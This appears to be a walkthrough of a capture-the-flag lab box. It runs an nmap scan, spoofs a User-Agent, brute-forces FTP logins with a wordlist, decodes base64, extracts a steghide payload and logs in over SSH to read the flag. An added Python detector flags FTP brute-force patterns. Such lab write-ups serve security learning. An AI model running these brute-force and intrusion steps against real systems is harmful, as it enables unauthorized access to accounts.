$ nmap -sC -sV -p- -oN nmap.out 10.10.124.244
Nmap scan report for 10.10.124.244
Host is up (0.20s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
|   256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
|_  256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Annoucement
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jun 15 14:21:00 2021 -- 1 IP address (1 host up) scanned in 432.82 seconds
How do you redirect yourself to a secret page?
Answer: user-agent
What is the agent name?
Answer: chris
Steps to Reproduce:
Use curl with the following options:
-A: sets the User-Agent header (the value must be C, as mentioned in the hint)
-L: follows redirects
$ curl -LA C http://10.10.124.244/
Attention chris, <br><br>
Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak! <br><br>
From,<br>
Agent R
Hash cracking and brute-force
FTP password
Answer: crystal
Steps to Reproduce:
Use nmap or hydra:
$ nmap --script ftp-brute --script-args userdb=users.txt,passdb=/usr/share/wordlists/rockyou.txt -p 21 -oN ftp-brute.out 10.10.124.244
Nmap scan report for 10.10.124.244
Host is up (0.17s latency).

PORT   STATE SERVICE
21/tcp open  ftp
| ftp-brute:
|   Accounts:
|     chris:crystal - Valid credentials
|_  Statistics: Performed 261 guesses in 174 seconds, average tps: 2.5

# Nmap done at Tue Jun 15 14:41:53 2021 -- 1 IP address (1 host up) scanned in 200.60 seconds
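Seen from the FTP server's side, the ftp-brute run above is a burst of failed logins from one client followed by a success. As an added example (not part of the original write-up), this Python detector flags that pattern in vsftpd's log; the log line shape, the thresholds and the 192.0.2.x addresses are assumptions, and the sample log is constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

FMT = "%a %b %d %H:%M:%S %Y"
# Assumed line shape: vsftpd's native log (not xferlog), e.g.
# Tue Jun 15 14:39:00 2021 [pid 900] [chris] FAIL LOGIN: Client "::ffff:192.0.2.10"
LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: '
    r'Client "(?:::ffff:)?(?P<client>[^"]+)"')

def detect(lines, threshold=10, window=timedelta(seconds=60)):
    """Return alerts for clients with >= threshold failed logins inside window,
    and for any successful login by a client already flagged."""
    failures = defaultdict(deque)   # client -> timestamps of recent failures
    flagged, alerts = set(), []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue                # unrelated or malformed line
        ts = datetime.strptime(m["ts"], FMT)
        client, user = m["client"], m["user"]
        recent = failures[client]
        while recent and ts - recent[0] > window:
            recent.popleft()        # drop failures that aged out of the window
        if m["result"] == "FAIL":
            recent.append(ts)
            if len(recent) >= threshold and client not in flagged:
                flagged.add(client)
                alerts.append(("brute-force", client, user, ts))
        elif client in flagged:
            # A guess worked: treat the account as compromised.
            alerts.append(("login-after-brute-force", client, user, ts))
    return alerts

def sample_log():
    """Constructed log: one client guessing at 'chris', one user mistyping."""
    t0 = datetime(2021, 6, 15, 14, 39, 0)
    def row(sec, user, result, ip):
        stamp = (t0 + timedelta(seconds=sec)).strftime(FMT)
        return f'{stamp} [pid 900] [{user}] {result} LOGIN: Client "::ffff:{ip}"'
    rows = [row(s, "chris", "FAIL", "192.0.2.10") for s in range(30)]
    rows.append(row(30, "chris", "OK", "192.0.2.10"))
    rows += [row(40, "ftpuser", "FAIL", "192.0.2.20"),
             row(45, "ftpuser", "OK", "192.0.2.20")]
    return rows

if __name__ == "__main__":
    for alert in detect(sample_log()):
        print(alert)
```

The second alert kind is the one to page on: it means a guessed password was accepted, so the account's credentials need rotating, not just the client blocking.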
$ cat To_agentJ.txt
Dear agent J,

All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.

From,
Agent C
$ 7z x data.zip

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.utf8,Utf16=on,HugeFiles=on,64 bits,1 CPU Intel(R) Core(TM) i7-8550U CPU @ 1.80GHz (806EA),ASM,AES-NI)

Scanning the drive for archives:
1 file, 280 bytes (1 KiB)

Extracting archive: data.zip
--
Path = data.zip
Type = zip
Physical Size = 280

Enter password (will not be echoed):
Everything is Ok

Size:       86
Compressed: 280
Contents of To_agentR.txt:
$ cat To_agentR.txt
Agent C,
We need to send the picture to 'QXJlYTUx' as soon as possible!
By,
Agent R
Base64 Decoding to get the password:
$ echo QXJlYTUx | base64 -d
Area51
Who is the other agent (in full name)?
Answer: James
Steps to Reproduce:
Use the passphrase to extract the contents from cute-alien.jpg using steghide:
$ steghide extract -sf cute-alien.jpg
Enter passphrase:
wrote extracted data to "message.txt".
$ cat message.txt
Hi james,

Glad you find this message. Your login password is hackerrules!

Don't ask me why the password look cheesy, ask agent R who set this password for you.

Your buddy,
chris
SSH password
Answer: hackerrules!
Capture the user flag
What is the user flag?
Log in over SSH to find the user flag:
$ ssh james@10.10.124.244
The authenticity of host '10.10.124.244 (10.10.124.244)' can't be established.
ECDSA key fingerprint is SHA256:yr7mJyy+j1G257OVtst3Zkl+zFQw8ZIBRmfLi7fX/D8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.124.244' (ECDSA) to the list of known hosts.
james@10.10.124.244's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Jun 15 09:48:48 UTC 2021

  System load:  0.0               Processes:           97
  Usage of /:   39.8% of 9.78GB   Users logged in:     0
  Memory usage: 34%               IP address for eth0: 10.10.124.244
  Swap usage:   0%

75 packages can be updated.
33 updates are security updates.

Last login: Tue Oct 29 14:26:27 2019
james@agent-sudo:~$ ls
Alien_autospy.jpg  user_flag.txt
james@agent-sudo:~$ cat user_flag.txt
REDACTED